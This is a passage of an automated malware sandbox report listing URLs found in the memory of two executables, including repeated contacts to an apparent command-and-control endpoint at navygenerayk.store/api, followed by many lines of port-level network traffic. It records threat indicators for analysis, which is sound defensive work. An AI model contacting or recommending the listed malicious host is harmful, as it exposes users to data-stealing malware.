0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.ldb.9.dr	String found in binary or memory: https://edgeassetservice.azure
Source: 000003.ldb.9.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/
Source: 000003.log12.9.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log12.9.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log12.9.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log12.9.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: 000003.log6.9.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/product_category_en/1.0.0/asset?assetgroup=ProductCate
Source: 000003.log12.9.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: chromecache_573.4.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_573.4.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_573.4.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_573.4.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_573.4.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_573.4.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_573.4.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_573.4.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_573.4.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_573.4.dr	String found in binary or memory: https://github.com/nschonni
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3583089738.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chromecache_573.4.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Source: 000003.ldb.9.dr	String found in binary or memory: https://mail.google.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2920696823.0000000005B57000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2920466699.0000000005BB1000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3119954156.00000000058F0000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3120484461.00000000058DD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3119403198.00000000058ED000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116982958.00000000058DA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3513822207.0000000005B93000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3515211706.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3515036542.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3514891215.0000000005B82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.comXID/
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2920696823.0000000005B57000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2920466699.0000000005BB1000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3119954156.00000000058F0000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3120484461.00000000058DD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3119403198.00000000058ED000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116982958.00000000058DA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3513822207.0000000005B93000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3515211706.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3515036542.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3514891215.0000000005B82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.comXIDv10N
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3535165376.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3535383922.0000000005B56000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3360654673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/
Source: 6ca8f7e5e2.exe, 00000023.00000003.3138038343.0000000001163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/(
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3533159002.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3535165376.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/9
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3534273958.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3452936282.0000000005B55000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3535383922.0000000005B56000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3452508746.0000000005B55000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3515443201.0000000005B51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/A
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2978029803.000000000130B000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.3134891644.0000000001307000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2952635468.000000000130B000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.3135063410.000000000130A000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2989243380.000000000130B000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2933378558.000000000130B000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2949173424.000000000130B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/Fo
Source: 6ca8f7e5e2.exe, 00000023.00000003.3250771327.0000000001162000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3138038343.0000000001163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/X
Source: 6ca8f7e5e2.exe, 00000023.00000003.3138038343.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000002.3378580067.0000000001166000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3120548036.0000000001161000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3213031604.0000000001184000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3629915711.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3534273958.0000000005B51000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3629840706.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3642008461.00000000014F1000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3360654673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/api
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3601485586.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3601645856.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3601927914.00000000014EC000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3601809913.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3642008461.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/api.
Source: 6ca8f7e5e2.exe, 0000001C.00000003.3134891644.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000002.3229646487.0000000001290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/api6v
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3673446075.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apiD8
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apiL
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3673524180.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apiN
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3601485586.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3601809913.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apic
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3452997592.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3515504850.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apihpcRGN
Source: 6ca8f7e5e2.exe, 00000023.00000003.3207920116.0000000001187000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apiw
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3634688340.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apiz8
Source: 6ca8f7e5e2.exe, 0000001C.00000003.2989460853.00000000012FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/jRn
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/lf
Source: 6ca8f7e5e2.exe, 0000002B.00000002.3769018409.0000000001485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/ta
Source: 6ca8f7e5e2.exe, 00000023.00000002.3378580067.00000000010D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store:443/apiicrosoft
Source: 000003.ldb.9.dr	String found in binary or memory: https://open.spotify.com
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3537796193.0000000005C75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3537796193.0000000005C75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2347934776.00000000234C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: 000003.ldb.9.dr	String found in binary or memory: https://web.skype.com/?
Source: file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348404528.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3168645780.0000000001160000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583354047.0000000005B80000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583089738.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2409398510.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348404528.0000000000DED000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3168645780.0000000001160000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583354047.0000000005B80000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3583089738.0000000005B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: content_new.js.9.dr	String found in binary or memory: https://www.google.com/chrome
Source: file.exe, 00000000.00000003.2187780870.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2904636044.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919607246.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2919514089.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092194855.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3116779772.0000000005922000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3092620419.0000000005908000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3091963136.000000000590B000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3456431500.0000000005BBD000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365343148.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3454599164.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3365202016.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.2407206885.0000000000624000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3537796193.0000000005C75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2407206885.0000000000624000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2407206885.0000000000624000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2407206885.0000000000707000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.2407206885.0000000000707000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3537796193.0000000005C75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2407206885.0000000000624000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2347934776.00000000234C0000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2935416777.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3143561840.00000000059FA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3537796193.0000000005C75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 6ca8f7e5e2.exe, 0000002B.00000003.3537796193.0000000005C75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2347934776.00000000234C0000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2935416777.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3143561840.00000000059FA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3537796193.0000000005C75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2407206885.0000000000624000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2347934776.00000000234C0000.00000004.00000020.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.2935416777.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 00000023.00000003.3143561840.00000000059FA000.00000004.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000002B.00000003.3537796193.0000000005C75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2407206885.0000000000624000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: 000003.ldb.9.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNs
Source: 000003.ldb.9.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 000003.ldb.9.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 000003.ldb.9.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
